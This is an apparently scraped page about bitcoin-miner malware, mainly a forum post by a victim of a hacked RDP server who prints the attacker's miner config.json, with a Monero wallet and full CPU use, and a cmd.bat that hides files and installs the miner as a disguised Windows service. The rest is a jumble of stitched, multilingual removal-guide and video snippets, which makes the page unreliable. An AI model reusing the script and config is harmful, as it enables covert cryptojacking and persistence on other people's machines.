How to Tell if you Have a Bitcoin Miner Virus Crypto ...

MoneroOcean pool owner supports botnets

Hi guys,
As of late my vps that was running Microsoft's RDP got hacked. The attacker ran a malware miner named system.exe that was using 99% CPU. I'm gonna post a screenshot of all of it right here so he gets publicly exposed for his deeds.
By further investigation I found that this miner uses config.json as it's configuration file and I'm posting the contents also publicly here:
{ "algo": "cryptonight", "api": { "port": 0, "access-token": null, "id": null, "worker-id": null, "ipv6": false, "restricted": true }, "asm": true, "autosave": true, "av": 0, "background": false, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 0, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 100, "pools": [ { "url": "", "user": "44CZd8EvSktM2FzqMVbMBc9pWDcL45yYTWY3VzdymUbjDG6F1734vQh4dj9hjn7tj3eFohS8NGSDSNNVzBxLt7Eb8Vw8vrq", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": false, "variant": -1, "enabled": true, "tls": false, "tls-fingerprint": null } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "threads": [ { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true } ], "user-agent": null, "watch": true }
cmd.bat contents are the following:
attrib -a -s -r -h C:\WINDOWS\Debug\nat* net stop Networks taskkill /f /im system.exe C:\WINDOWS\Debug\nat\svchost.exe install "Networks20181019" C:\WINDOWS\Debug\nat\system.exe sc config "Networks20181019" DisplayName= "Networksr20181019" sc description "Networks20181019" "Microsoft Windows Networks" Set ProcessName=system.exe sc start "Networks20181019" attrib +a +s +r +h C:\WINDOWS\Debug\nat* echo u/off del %USERPROFILE%\Desktop\0.exe
I've scanned everything on VirusTotal and upon visiting the pool I've noticed that the miner has a hefty 50 KH/s. I've also contacted the pool owner via Discord and can post the whole discussion if anyone is willing to see it. He doesn't want to ban the miner, shortly.
I'm not so familiar with Monero but I had Bitcoins and I fully support the mining community. I understand that people with botnets increase difficulty for normal people to make a profit. I've also reported this guy to his ISP by examining the IP found in Event Viewer, since he didn't use a VPN (the IP isn't detected as proxy). I won't post the IP's publicly.
What more can I do? The pool owner also threatened me to report another XMR wallet address to SupportXMR pool because he thought I was a competitive attacker. I can also give that address aswell.
Thank you for reading and stay safe :)
submitted by r00t_of_bnets to Monero [link] [comments]

Vírus minerando bitcoins no meu computador! Do You Have A Bitcoin Mining Virus?  How To DETECT And ... HORRIBLE BITCOIN MINING VIRUS SPREADING - 30% INFECTED How to Remove BitcoinMiner What is Bitcoin Mining? - YouTube

Eine Krypto-Miner-Malware befällt Ihren PC oder andere Geräte wie ein gewöhnlicher Virus, beginnt dann aber damit, Ihr Gerät zum Berechnen einer digitalen Währung zu nutzen. Um etwa Bitcoins ... How to remove a Bitcoin miner virus? Crypto mining malware removal can be done manually. However, this requires considerable technical skill because it’s not just a matter of finding and deleting an executable file. You will also have to manually edit the system registry and risk bricking your computer. It’s easier and far less risky, to use antimalware software. Not all antivirus programs ... Der CoinMiner-Virus missbraucht die Rechenleistung Ihres Computers, damit der Inhaber des Virus Geld mit aufwendigen Berechnungen verdient. Wie das Prinzip des BitCoin Mining genau funktioniert, erfahren Sie in diesem Praxistipp. Laden Sie sich das kostenlose Programm Malwarebytes Anti-Malware bei CHIP herunter und installieren Sie es. Hierbei handelt es sich um einen äußerst zuverlässigen ... La actividad maliciosa del virus se compone de ejecutar múltiples scripts maliciosos en la PC infectada por una puerta trasera que el Virus Bitcoin Miner ejecuta de antemano. Estos scripts tienen el propósito de conectar el virus a un servidor de control y mando. Si el virus de minería usa diferentes clases para ejecutar más scripts que permiten que se lleven a cabo varias acciones: Der BitCoin Miner-Virus oder der BitCoin Mining-Virus ist eine gefährliche Malware, die möglicherweise Ihre CPU und / oder GPU verwendet, um die BitCoin-Kryptowährung durch illegales Mining abzurufen. Cryptocurrency Miner greifen immer wieder auf Computer zu und versuchen, mit ihren Ressourcen Einnahmen für ihre Entwickler zu generieren. Obwohl diese Art der Infektion BitCoinMiner heißt ...

[index] [17150] [41032] [2306] [1779] [47357] [37780] [16505] [33702] [26316] [19316]

Vírus minerando bitcoins no meu computador!

Remove bitcoin miner trojan Virus (Virus Removal Guide) Visit Site :- BitcoinMiner is a Malware that was designed to force your computer to mine crypto-currency that is called Bitcoin. When the Bitcoins have been mined on the computer’s system, the designer of this... This video is simply some unedited footage that I was preparing to show how malware that masquerades as a Realtek Audio Driver sits and uses system resources to mine Bitcoin for the malware author. Olá! Notei uma lentidão no computador, provocada por um vírus que estava minerando Bitcoins no meu computador. Nesse vídeo você acompanha como resolvi o problema. Produção e Edição: Eu ... For more information: and What is Bitcoin Mining? Have you ever wondered how Bitcoin is generated? T...